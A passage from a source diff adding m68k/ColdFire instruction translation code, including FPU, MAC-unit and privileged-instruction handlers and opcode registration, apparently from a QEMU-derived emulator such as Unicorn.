+DISAS_INSN(move_to_usp) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* TODO: Implement USP. */ + gen_exception(s, s->pc - 2, EXCP_ILLEGAL); +} + +DISAS_INSN(halt) +{ + gen_exception(s, s->pc, EXCP_HALT_INSN); +} + +DISAS_INSN(stop) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t ext; + + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + + gen_set_sr_im(s, ext, 0); + tcg_gen_movi_i32(tcg_ctx, tcg_ctx->cpu_halted, 1); + gen_exception(s, s->pc, EXCP_HLT); +} + +DISAS_INSN(rte) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + gen_exception(s, s->pc - 2, EXCP_RTE); +} + +DISAS_INSN(movec) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t ext; + TCGv reg; + + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + + if (ext & 0x8000) { + reg = AREG(ext, 12); + } else { + reg = DREG(ext, 12); + } + gen_helper_movec(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, ext & 0xfff), reg); + gen_lookup_tb(s); +} + +DISAS_INSN(intouch) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* ICache fetch. Implement as no-op. */ +} + +DISAS_INSN(cpushl) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* Cache push/invalidate. Implement as no-op. */ +} + +DISAS_INSN(wddata) +{ + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); +} + +DISAS_INSN(wdebug) +{ + if (IS_USER(s)) { + gen_exception(s, s->pc - 2, EXCP_PRIVILEGE); + return; + } + /* TODO: Implement wdebug. */ + qemu_log("WDEBUG not implemented\n"); + gen_exception(s, s->pc - 2, EXCP_UNSUPPORTED); +} + +DISAS_INSN(trap) +{ + gen_exception(s, s->pc - 2, EXCP_TRAP0 + (insn & 0xf)); +} + +/* ??? FP exceptions are not implemented. Most exceptions are deferred until + immediately before the next FP instruction is executed. */ +DISAS_INSN(fpu) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint16_t ext; + int32_t offset; + int opmode; + TCGv_i64 src; + TCGv_i64 dest; + TCGv_i64 res; + TCGv tmp32; + int round; + int set_dest; + int opsize; + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + opmode = ext & 0x7f; + switch ((ext >> 13) & 7) { + case 0: case 2: + break; + case 1: + goto undef; + case 3: /* fmove out */ + src = FREG(ext, 7); + tmp32 = tcg_temp_new_i32(tcg_ctx); + /* fmove */ + /* ??? TODO: Proper behavior on overflow. */ + switch ((ext >> 10) & 7) { + case 0: + opsize = OS_LONG; + gen_helper_f64_to_i32(tcg_ctx, tmp32, tcg_ctx->cpu_env, src); + break; + case 1: + opsize = OS_SINGLE; + gen_helper_f64_to_f32(tcg_ctx, tmp32, tcg_ctx->cpu_env, src); + break; + case 4: + opsize = OS_WORD; + gen_helper_f64_to_i32(tcg_ctx, tmp32, tcg_ctx->cpu_env, src); + break; + case 5: /* OS_DOUBLE */ + tcg_gen_mov_i32(tcg_ctx, tmp32, AREG(insn, 0)); + switch ((insn >> 3) & 7) { + case 2: + case 3: + break; + case 4: + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, -8); + break; + case 5: + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, offset); + break; + default: + goto undef; + } + gen_store64(s, tmp32, src); + switch ((insn >> 3) & 7) { + case 3: + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, 8); + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp32); + break; + case 4: + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp32); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp32); + return; + case 6: + opsize = OS_BYTE; + gen_helper_f64_to_i32(tcg_ctx, tmp32, tcg_ctx->cpu_env, src); + break; + default: + goto undef; + } + DEST_EA(env, insn, opsize, tmp32, NULL); + tcg_temp_free_i32(tcg_ctx, tmp32); + return; + case 4: /* fmove to control register. */ + switch ((ext >> 10) & 7) { + case 4: /* FPCR */ + /* Not implemented. Ignore writes. */ + break; + case 1: /* FPIAR */ + case 2: /* FPSR */ + default: + qemu_log("Unimplemented: fmove to control %d\n", + (ext >> 10) & 7); + goto undef; + } + break; + case 5: /* fmove from control register. */ + switch ((ext >> 10) & 7) { + case 4: /* FPCR */ + /* Not implemented. Always return zero. */ + tmp32 = tcg_const_i32(tcg_ctx, 0); + break; + case 1: /* FPIAR */ + case 2: /* FPSR */ + default: + qemu_log("Unimplemented: fmove from control %d\n", + (ext >> 10) & 7); + goto undef; + } + DEST_EA(env, insn, OS_LONG, tmp32, NULL); + break; + case 6: /* fmovem */ + case 7: + { + TCGv addr; + uint16_t mask; + int i; + if ((ext & 0x1f00) != 0x1000 || (ext & 0xff) == 0) + goto undef; + tmp32 = gen_lea(env, s, insn, OS_LONG); + if (IS_NULL_QREG(tmp32)) { + gen_addr_fault(s); + return; + } + addr = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, addr, tmp32); + mask = 0x80; + for (i = 0; i < 8; i++) { + if (ext & mask) { + s->is_mem = 1; + dest = FREG(i, 0); + if (ext & (1 << 13)) { + /* store */ + tcg_gen_qemu_stf64(s->uc, dest, addr, IS_USER(s)); + } else { + /* load */ + tcg_gen_qemu_ldf64(s->uc, dest, addr, IS_USER(s)); + } + if (ext & (mask - 1)) + tcg_gen_addi_i32(tcg_ctx, addr, addr, 8); + } + mask >>= 1; + } + tcg_temp_free_i32(tcg_ctx, addr); + } + return; + } + if (ext & (1 << 14)) { + /* Source effective address. */ + switch ((ext >> 10) & 7) { + case 0: opsize = OS_LONG; break; + case 1: opsize = OS_SINGLE; break; + case 4: opsize = OS_WORD; break; + case 5: opsize = OS_DOUBLE; break; + case 6: opsize = OS_BYTE; break; + default: + goto undef; + } + if (opsize == OS_DOUBLE) { + tmp32 = tcg_temp_new_i32(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, tmp32, AREG(insn, 0)); + switch ((insn >> 3) & 7) { + case 2: + case 3: + break; + case 4: + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, -8); + break; + case 5: + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, offset); + break; + case 7: + offset = cpu_ldsw_code(env, s->pc); + offset += s->pc - 2; + s->pc += 2; + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, offset); + break; + default: + goto undef; + } + src = gen_load64(s, tmp32); + switch ((insn >> 3) & 7) { + case 3: + tcg_gen_addi_i32(tcg_ctx, tmp32, tmp32, 8); + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp32); + break; + case 4: + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), tmp32); + break; + } + tcg_temp_free_i32(tcg_ctx, tmp32); + } else { + SRC_EA(env, tmp32, opsize, 1, NULL); + src = tcg_temp_new_i64(tcg_ctx); + switch (opsize) { + case OS_LONG: + case OS_WORD: + case OS_BYTE: + gen_helper_i32_to_f64(tcg_ctx, src, tcg_ctx->cpu_env, tmp32); + break; + case OS_SINGLE: + gen_helper_f32_to_f64(tcg_ctx, src, tcg_ctx->cpu_env, tmp32); + break; + } + } + } else { + /* Source register. */ + src = FREG(ext, 10); + } + dest = FREG(ext, 7); + res = tcg_temp_new_i64(tcg_ctx); + if (opmode != 0x3a) + tcg_gen_mov_f64(tcg_ctx, res, dest); + round = 1; + set_dest = 1; + switch (opmode) { + case 0: case 0x40: case 0x44: /* fmove */ + tcg_gen_mov_f64(tcg_ctx, res, src); + break; + case 1: /* fint */ + gen_helper_iround_f64(tcg_ctx, res, tcg_ctx->cpu_env, src); + round = 0; + break; + case 3: /* fintrz */ + gen_helper_itrunc_f64(tcg_ctx, res, tcg_ctx->cpu_env, src); + round = 0; + break; + case 4: case 0x41: case 0x45: /* fsqrt */ + gen_helper_sqrt_f64(tcg_ctx, res, tcg_ctx->cpu_env, src); + break; + case 0x18: case 0x58: case 0x5c: /* fabs */ + gen_helper_abs_f64(tcg_ctx, res, src); + break; + case 0x1a: case 0x5a: case 0x5e: /* fneg */ + gen_helper_chs_f64(tcg_ctx, res, src); + break; + case 0x20: case 0x60: case 0x64: /* fdiv */ + gen_helper_div_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + break; + case 0x22: case 0x62: case 0x66: /* fadd */ + gen_helper_add_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + break; + case 0x23: case 0x63: case 0x67: /* fmul */ + gen_helper_mul_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + break; + case 0x28: case 0x68: case 0x6c: /* fsub */ + gen_helper_sub_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + break; + case 0x38: /* fcmp */ + gen_helper_sub_cmp_f64(tcg_ctx, res, tcg_ctx->cpu_env, res, src); + set_dest = 0; + round = 0; + break; + case 0x3a: /* ftst */ + tcg_gen_mov_f64(tcg_ctx, res, src); + set_dest = 0; + round = 0; + break; + default: + goto undef; + } + if (ext & (1 << 14)) { + tcg_temp_free_i64(tcg_ctx, src); + } + if (round) { + if (opmode & 0x40) { + if ((opmode & 0x4) != 0) + round = 0; + } else if ((s->fpcr & M68K_FPCR_PREC) == 0) { + round = 0; + } + } + if (round) { + TCGv tmp = tcg_temp_new_i32(tcg_ctx); + gen_helper_f64_to_f32(tcg_ctx, tmp, tcg_ctx->cpu_env, res); + gen_helper_f32_to_f64(tcg_ctx, res, tcg_ctx->cpu_env, tmp); + tcg_temp_free_i32(tcg_ctx, tmp); + } + tcg_gen_mov_f64(tcg_ctx, tcg_ctx->QREG_FP_RESULT, res); + if (set_dest) { + tcg_gen_mov_f64(tcg_ctx, dest, res); + } + tcg_temp_free_i64(tcg_ctx, res); + return; +undef: + /* FIXME: Is this right for offset addressing modes? */ + s->pc -= 2; + disas_undef_fpu(env, s, insn); +} + +DISAS_INSN(fbcc) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + uint32_t offset; + uint32_t addr; + TCGv flag; + int l1; + + addr = s->pc; + offset = cpu_ldsw_code(env, s->pc); + s->pc += 2; + if (insn & (1 << 6)) { + offset = (offset << 16) | cpu_lduw_code(env, s->pc); + s->pc += 2; + } + + l1 = gen_new_label(tcg_ctx); + /* TODO: Raise BSUN exception. */ + flag = tcg_temp_new(tcg_ctx); + gen_helper_compare_f64(tcg_ctx, flag, tcg_ctx->cpu_env, tcg_ctx->QREG_FP_RESULT); + /* Jump to l1 if condition is true. */ + switch (insn & 0xf) { + case 0: /* f */ + break; + case 1: /* eq (=0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_EQ, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 2: /* ogt (=1) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_EQ, flag, tcg_const_i32(tcg_ctx, 1), l1); + break; + case 3: /* oge (=0 or =1) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_LEU, flag, tcg_const_i32(tcg_ctx, 1), l1); + break; + case 4: /* olt (=-1) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_LT, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 5: /* ole (=-1 or =0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_LE, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 6: /* ogl (=-1 or =1) */ + tcg_gen_andi_i32(tcg_ctx, flag, flag, 1); + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_NE, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 7: /* or (=2) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_EQ, flag, tcg_const_i32(tcg_ctx, 2), l1); + break; + case 8: /* un (<2) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_LT, flag, tcg_const_i32(tcg_ctx, 2), l1); + break; + case 9: /* ueq (=0 or =2) */ + tcg_gen_andi_i32(tcg_ctx, flag, flag, 1); + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_EQ, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 10: /* ugt (>0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_GT, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 11: /* uge (>=0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_GE, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 12: /* ult (=-1 or =2) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_GEU, flag, tcg_const_i32(tcg_ctx, 2), l1); + break; + case 13: /* ule (!=1) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_NE, flag, tcg_const_i32(tcg_ctx, 1), l1); + break; + case 14: /* ne (!=0) */ + tcg_gen_brcond_i32(tcg_ctx, TCG_COND_NE, flag, tcg_const_i32(tcg_ctx, 0), l1); + break; + case 15: /* t */ + tcg_gen_br(tcg_ctx, l1); + break; + } + gen_jmp_tb(s, 0, s->pc); + gen_set_label(tcg_ctx, l1); + gen_jmp_tb(s, 1, addr + offset); +} + +DISAS_INSN(frestore) +{ + M68kCPU *cpu = m68k_env_get_cpu(env); + + /* TODO: Implement frestore. */ + cpu_abort(CPU(cpu), "FRESTORE not implemented"); +} + +DISAS_INSN(fsave) +{ + M68kCPU *cpu = m68k_env_get_cpu(env); + + /* TODO: Implement fsave. */ + cpu_abort(CPU(cpu), "FSAVE not implemented"); +} + +static inline TCGv gen_mac_extract_word(DisasContext *s, TCGv val, int upper) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv tmp = tcg_temp_new(tcg_ctx); + if (s->env->macsr & MACSR_FI) { + if (upper) + tcg_gen_andi_i32(tcg_ctx, tmp, val, 0xffff0000); + else + tcg_gen_shli_i32(tcg_ctx, tmp, val, 16); + } else if (s->env->macsr & MACSR_SU) { + if (upper) + tcg_gen_sari_i32(tcg_ctx, tmp, val, 16); + else + tcg_gen_ext16s_i32(tcg_ctx, tmp, val); + } else { + if (upper) + tcg_gen_shri_i32(tcg_ctx, tmp, val, 16); + else + tcg_gen_ext16u_i32(tcg_ctx, tmp, val); + } + return tmp; +} + +static void gen_mac_clear_flags(DisasContext *s) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MACSR, *(TCGv *)tcg_ctx->QREG_MACSR, + ~(MACSR_V | MACSR_Z | MACSR_N | MACSR_EV)); +} + +DISAS_INSN(mac) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv rx; + TCGv ry; + uint16_t ext; + int acc; + TCGv tmp; + TCGv addr; + TCGv loadval; + int dual; + TCGv saved_flags; + + if (!s->done_mac) { + s->mactmp = tcg_temp_new_i64(tcg_ctx); + s->done_mac = 1; + } + + ext = cpu_lduw_code(env, s->pc); + s->pc += 2; + + acc = ((insn >> 7) & 1) | ((ext >> 3) & 2); + dual = ((insn & 0x30) != 0 && (ext & 3) != 0); + if (dual && !m68k_feature(s->env, M68K_FEATURE_CF_EMAC_B)) { + disas_undef(env, s, insn); + return; + } + if (insn & 0x30) { + /* MAC with load. */ + tmp = gen_lea(env, s, insn, OS_LONG); + addr = tcg_temp_new(tcg_ctx); + tcg_gen_and_i32(tcg_ctx, addr, tmp, *(TCGv *)tcg_ctx->QREG_MAC_MASK); + /* Load the value now to ensure correct exception behavior. + Perform writeback after reading the MAC inputs. */ + loadval = gen_load(s, OS_LONG, addr, 0); + + acc ^= 1; + rx = (ext & 0x8000) ? AREG(ext, 12) : DREG(insn, 12); + ry = (ext & 8) ? AREG(ext, 0) : DREG(ext, 0); + } else { + loadval = addr = *(TCGv *)tcg_ctx->NULL_QREG; + rx = (insn & 0x40) ? AREG(insn, 9) : DREG(insn, 9); + ry = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + } + + gen_mac_clear_flags(s); +#if 0 + l1 = -1; + /* Disabled because conditional branches clobber temporary vars. */ + if ((s->env->macsr & MACSR_OMC) != 0 && !dual) { + /* Skip the multiply if we know we will ignore it. */ + l1 = gen_new_label(tcg_ctx); + tmp = tcg_temp_new(tcg_ctx); + tcg_gen_andi_i32(tcg_ctx, tmp, *(TCGv *)tcg_ctx->QREG_MACSR, 1 << (acc + 8)); + gen_op_jmp_nz32(tmp, l1); + } +#endif + + if ((ext & 0x0800) == 0) { + /* Word. */ + rx = gen_mac_extract_word(s, rx, (ext & 0x80) != 0); + ry = gen_mac_extract_word(s, ry, (ext & 0x40) != 0); + } + if (s->env->macsr & MACSR_FI) { + gen_helper_macmulf(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); + } else { + if (s->env->macsr & MACSR_SU) + gen_helper_macmuls(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); + else + gen_helper_macmulu(tcg_ctx, s->mactmp, tcg_ctx->cpu_env, rx, ry); + switch ((ext >> 9) & 3) { + case 1: + tcg_gen_shli_i64(tcg_ctx, s->mactmp, s->mactmp, 1); + break; + case 3: + tcg_gen_shri_i64(tcg_ctx, s->mactmp, s->mactmp, 1); + break; + } + } + + if (dual) { + /* Save the overflow flag from the multiply. */ + saved_flags = tcg_temp_new(tcg_ctx); + tcg_gen_mov_i32(tcg_ctx, saved_flags, *(TCGv *)tcg_ctx->QREG_MACSR); + } else { + saved_flags = *(TCGv *)tcg_ctx->NULL_QREG; + } + +#if 0 + /* Disabled because conditional branches clobber temporary vars. */ + if ((s->env->macsr & MACSR_OMC) != 0 && dual) { + /* Skip the accumulate if the value is already saturated. */ + l1 = gen_new_label(tcg_ctx); + tmp = tcg_temp_new(tcg_ctx); + gen_op_and32(tmp, *(TCGv *)tcg_ctx->QREG_MACSR, tcg_const_i32(tcg_ctx, MACSR_PAV0 << acc)); + gen_op_jmp_nz32(tmp, l1); + } +#endif + + if (insn & 0x100) + tcg_gen_sub_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); + else + tcg_gen_add_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); + + if (s->env->macsr & MACSR_FI) + gen_helper_macsatf(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + else if (s->env->macsr & MACSR_SU) + gen_helper_macsats(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + else + gen_helper_macsatu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + +#if 0 + /* Disabled because conditional branches clobber temporary vars. */ + if (l1 != -1) + gen_set_label(tcg_ctx, l1); +#endif + + if (dual) { + /* Dual accumulate variant. */ + acc = (ext >> 2) & 3; + /* Restore the overflow flag from the multiplier. */ + tcg_gen_mov_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MACSR, saved_flags); +#if 0 + /* Disabled because conditional branches clobber temporary vars. */ + if ((s->env->macsr & MACSR_OMC) != 0) { + /* Skip the accumulate if the value is already saturated. */ + l1 = gen_new_label(tcg_ctx); + tmp = tcg_temp_new(tcg_ctx); + gen_op_and32(tmp, *(TCGv *)tcg_ctx->QREG_MACSR, tcg_const_i32(tcg_ctx, MACSR_PAV0 << acc)); + gen_op_jmp_nz32(tmp, l1); + } +#endif + if (ext & 2) + tcg_gen_sub_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); + else + tcg_gen_add_i64(tcg_ctx, MACREG(acc), MACREG(acc), s->mactmp); + if (s->env->macsr & MACSR_FI) + gen_helper_macsatf(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + else if (s->env->macsr & MACSR_SU) + gen_helper_macsats(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + else + gen_helper_macsatu(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); +#if 0 + /* Disabled because conditional branches clobber temporary vars. */ + if (l1 != -1) + gen_set_label(tcg_ctx, l1); +#endif + } + gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, acc)); + + if (insn & 0x30) { + TCGv rw; + rw = (insn & 0x40) ? AREG(insn, 9) : DREG(insn, 9); + tcg_gen_mov_i32(tcg_ctx, rw, loadval); + /* FIXME: Should address writeback happen with the masked or + unmasked value? */ + switch ((insn >> 3) & 7) { + case 3: /* Post-increment. */ + tcg_gen_addi_i32(tcg_ctx, AREG(insn, 0), addr, 4); + break; + case 4: /* Pre-decrement. */ + tcg_gen_mov_i32(tcg_ctx, AREG(insn, 0), addr); + } + } +} + +DISAS_INSN(from_mac) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv rx; + TCGv_i64 acc; + int accnum; + + rx = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + accnum = (insn >> 9) & 3; + acc = MACREG(accnum); + if (s->env->macsr & MACSR_FI) { + gen_helper_get_macf(tcg_ctx, rx, tcg_ctx->cpu_env, acc); + } else if ((s->env->macsr & MACSR_OMC) == 0) { + tcg_gen_trunc_i64_i32(tcg_ctx, rx, acc); + } else if (s->env->macsr & MACSR_SU) { + gen_helper_get_macs(tcg_ctx, rx, acc); + } else { + gen_helper_get_macu(tcg_ctx, rx, acc); + } + if (insn & 0x40) { + tcg_gen_movi_i64(tcg_ctx, acc, 0); + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MACSR, *(TCGv *)tcg_ctx->QREG_MACSR, ~(MACSR_PAV0 << accnum)); + } +} + +DISAS_INSN(move_mac) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + /* FIXME: This can be done without a helper. */ + int src; + TCGv dest; + src = insn & 3; + dest = tcg_const_i32(tcg_ctx, (insn >> 9) & 3); + gen_helper_mac_move(tcg_ctx, tcg_ctx->cpu_env, dest, tcg_const_i32(tcg_ctx, src)); + gen_mac_clear_flags(s); + gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, dest); +} + +DISAS_INSN(from_macsr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + + reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + tcg_gen_mov_i32(tcg_ctx, reg, *(TCGv *)tcg_ctx->QREG_MACSR); +} + +DISAS_INSN(from_mask) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + tcg_gen_mov_i32(tcg_ctx, reg, *(TCGv *)tcg_ctx->QREG_MAC_MASK); +} + +DISAS_INSN(from_mext) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv reg; + TCGv acc; + reg = (insn & 8) ? AREG(insn, 0) : DREG(insn, 0); + acc = tcg_const_i32(tcg_ctx, (insn & 0x400) ? 2 : 0); + if (s->env->macsr & MACSR_FI) + gen_helper_get_mac_extf(tcg_ctx, reg, tcg_ctx->cpu_env, acc); + else + gen_helper_get_mac_exti(tcg_ctx, reg, tcg_ctx->cpu_env, acc); +} + +DISAS_INSN(macsr_to_ccr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + tcg_gen_movi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_X, 0); + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_CC_DEST, *(TCGv *)tcg_ctx->QREG_MACSR, 0xf); + s->cc_op = CC_OP_FLAGS; +} + +DISAS_INSN(to_mac) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv_i64 acc; + TCGv val; + int accnum; + accnum = (insn >> 9) & 3; + acc = MACREG(accnum); + SRC_EA(env, val, OS_LONG, 0, NULL); + if (s->env->macsr & MACSR_FI) { + tcg_gen_ext_i32_i64(tcg_ctx, acc, val); + tcg_gen_shli_i64(tcg_ctx, acc, acc, 8); + } else if (s->env->macsr & MACSR_SU) { + tcg_gen_ext_i32_i64(tcg_ctx, acc, val); + } else { + tcg_gen_extu_i32_i64(tcg_ctx, acc, val); + } + tcg_gen_andi_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MACSR, *(TCGv *)tcg_ctx->QREG_MACSR, ~(MACSR_PAV0 << accnum)); + gen_mac_clear_flags(s); + gen_helper_mac_set_flags(tcg_ctx, tcg_ctx->cpu_env, tcg_const_i32(tcg_ctx, accnum)); +} + +DISAS_INSN(to_macsr) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv val; + SRC_EA(env, val, OS_LONG, 0, NULL); + gen_helper_set_macsr(tcg_ctx, tcg_ctx->cpu_env, val); + gen_lookup_tb(s); +} + +DISAS_INSN(to_mask) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv val; + SRC_EA(env, val, OS_LONG, 0, NULL); + tcg_gen_ori_i32(tcg_ctx, *(TCGv *)tcg_ctx->QREG_MAC_MASK, val, 0xffff0000); +} + +DISAS_INSN(to_mext) +{ + TCGContext *tcg_ctx = s->uc->tcg_ctx; + TCGv val; + TCGv acc; + SRC_EA(env, val, OS_LONG, 0, NULL); + acc = tcg_const_i32(tcg_ctx, (insn & 0x400) ? 2 : 0); + if (s->env->macsr & MACSR_FI) + gen_helper_set_mac_extf(tcg_ctx, tcg_ctx->cpu_env, val, acc); + else if (s->env->macsr & MACSR_SU) + gen_helper_set_mac_exts(tcg_ctx, tcg_ctx->cpu_env, val, acc); + else + gen_helper_set_mac_extu(tcg_ctx, tcg_ctx->cpu_env, val, acc); +} + +static void +register_opcode(TCGContext *tcg_ctx, disas_proc proc, uint16_t opcode, uint16_t mask) +{ + int i; + int from; + int to; + + /* Sanity check. All set bits must be included in the mask. */ + if (opcode & ~mask) { + fprintf(stderr, + "qemu internal error: bogus opcode definition %04x/%04x\n", + opcode, mask); + abort(); + } + /* This could probably be cleverer. For now just optimize the case where + the top bits are known. */ + /* Find the first zero bit in the mask. */ + i = 0x8000; + while ((i & mask) != 0) + i >>= 1; + /* Iterate over all combinations of this and lower bits. */ + if (i == 0) + i = 1; + else + i <<= 1; + from = opcode & ~(i - 1); + to = from + i; + for (i = from; i < to; i++) { + if ((i & mask) == opcode) { + tcg_ctx->opcode_table[i] = proc; + } + } +} + +/* Register m68k opcode handlers. Order is important. + Later insn override earlier ones. */ +void register_m68k_insns (CPUM68KState *env) +{ + TCGContext *tcg_ctx = env->uc->tcg_ctx; +#define INSN(name, opcode, mask, feature) do { \ + if (m68k_feature(env, M68K_FEATURE_##feature)) \ + register_opcode(tcg_ctx, disas_##name, 0x##opcode, 0x##mask); \ + } while(0) + INSN(undef, 0000, 0000, CF_ISA_A); + INSN(arith_im, 0080, fff8, CF_ISA_A); + INSN(bitrev, 00c0, fff8, CF_ISA_APLUSC); + INSN(bitop_reg, 0100, f1c0, CF_ISA_A); + INSN(bitop_reg, 0140, f1c0, CF_ISA_A); + INSN(bitop_reg, 0180, f1c0, CF_ISA_A); + INSN(bitop_reg, 01c0, f1c0, CF_ISA_A); + INSN(arith_im, 0280, fff8, CF_ISA_A); + INSN(byterev, 02c0, fff8, CF_ISA_APLUSC); + INSN(arith_im, 0480, fff8, CF_ISA_A); + INSN(ff1, 04c0, fff8, CF_ISA_APLUSC); + INSN(arith_im, 0680, fff8, CF_ISA_A); + INSN(bitop_im, 0800, ffc0, CF_ISA_A); + INSN(bitop_im, 0840, ffc0, CF_ISA_A); + INSN(bitop_im, 0880, ffc0, CF_ISA_A); + INSN(bitop_im, 08c0, ffc0, CF_ISA_A); + INSN(arith_im, 0a80, fff8, CF_ISA_A); + INSN(arith_im, 0c00, ff38, CF_ISA_A); + INSN(move, 1000, f000, CF_ISA_A); + INSN(move, 2000, f000, CF_ISA_A); + INSN(move, 3000, f000, CF_ISA_A); + INSN(strldsr, 40e7, ffff, CF_ISA_APLUSC); + INSN(negx, 4080, fff8, CF_ISA_A); + INSN(move_from_sr, 40c0, fff8, CF_ISA_A); + INSN(lea, 41c0, f1c0, CF_ISA_A); + INSN(clr, 4200, ff00, CF_ISA_A); + INSN(undef, 42c0, ffc0, CF_ISA_A); + INSN(move_from_ccr, 42c0, fff8, CF_ISA_A); + INSN(neg, 4480, fff8, CF_ISA_A); + INSN(move_to_ccr, 44c0, ffc0, CF_ISA_A); + INSN(not, 4680, fff8, CF_ISA_A); + INSN(move_to_sr, 46c0, ffc0, CF_ISA_A); + INSN(pea, 4840, ffc0, CF_ISA_A); + INSN(swap, 4840, fff8, CF_ISA_A); + INSN(movem, 48c0, fbc0, CF_ISA_A); + INSN(ext, 4880, fff8, CF_ISA_A); + INSN(ext, 48c0, fff8, CF_ISA_A); + INSN(ext, 49c0, fff8, CF_ISA_A); + INSN(tst, 4a00, ff00, CF_ISA_A); + INSN(tas, 4ac0, ffc0, CF_ISA_B); + INSN(halt, 4ac8, ffff, CF_ISA_A); + INSN(pulse, 4acc, ffff, CF_ISA_A); + INSN(illegal, 4afc, ffff, CF_ISA_A); + INSN(mull, 4c00, ffc0, CF_ISA_A); + INSN(divl, 4c40, ffc0, CF_ISA_A); + INSN(sats, 4c80, fff8, CF_ISA_B); + INSN(trap, 4e40, fff0, CF_ISA_A); + 